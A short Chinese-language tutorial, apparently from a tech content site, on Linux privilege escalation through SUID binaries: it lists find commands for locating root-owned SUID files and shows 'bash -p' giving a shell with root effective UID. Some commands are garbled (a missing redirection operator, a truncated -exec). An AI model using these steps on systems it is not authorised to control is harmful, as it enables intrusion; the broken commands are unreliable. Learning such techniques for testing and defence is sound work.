共计 654 个字符,预计需要花费 2 分钟才能阅读完成。
今天丸趣 TV 小编给大家分享一下 Linux 下如何利用 SUID 提权的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。
SUID 是 Linux 的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有 SUID 权限,那么就可以利用系统中的二进制文件和工具来进行 root 提权。
以下命令可以发现系统上运行的所有 SUID 可执行文件。具体来说,命令将尝试查找具有 root 权限的 SUID 的文件。
find / -user root -perm -4000 -print 2 /dev/null
find / -perm -u=s -type f 2 /dev/null
find / -user root -perm -4000 -exec ls
以上所有二进制文件都将以 root 用户权限执行,因为它们的权限中包含 s,并且对应的是 root 权限。
Bash
以下命令将以 root 权限打开一个 bash shell。
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)以上就是“Linux 下如何利用 SUID 提权”这篇文章的所有内容,感谢各位的阅读!相信大家阅读完这篇文章都有很大的收获,丸趣 TV 小编每天都会为大家更新不同的知识,如果还想学习更多的知识,请关注丸趣 TV 行业资讯频道。
正文完
![Frank#smith[Kfyzeiuqujbpygze,2,5]](https://cravatar.cn/avatar/ebd2642d86a4b40100d29dc76ec89b0d?s=96&d=monsterid&r=r)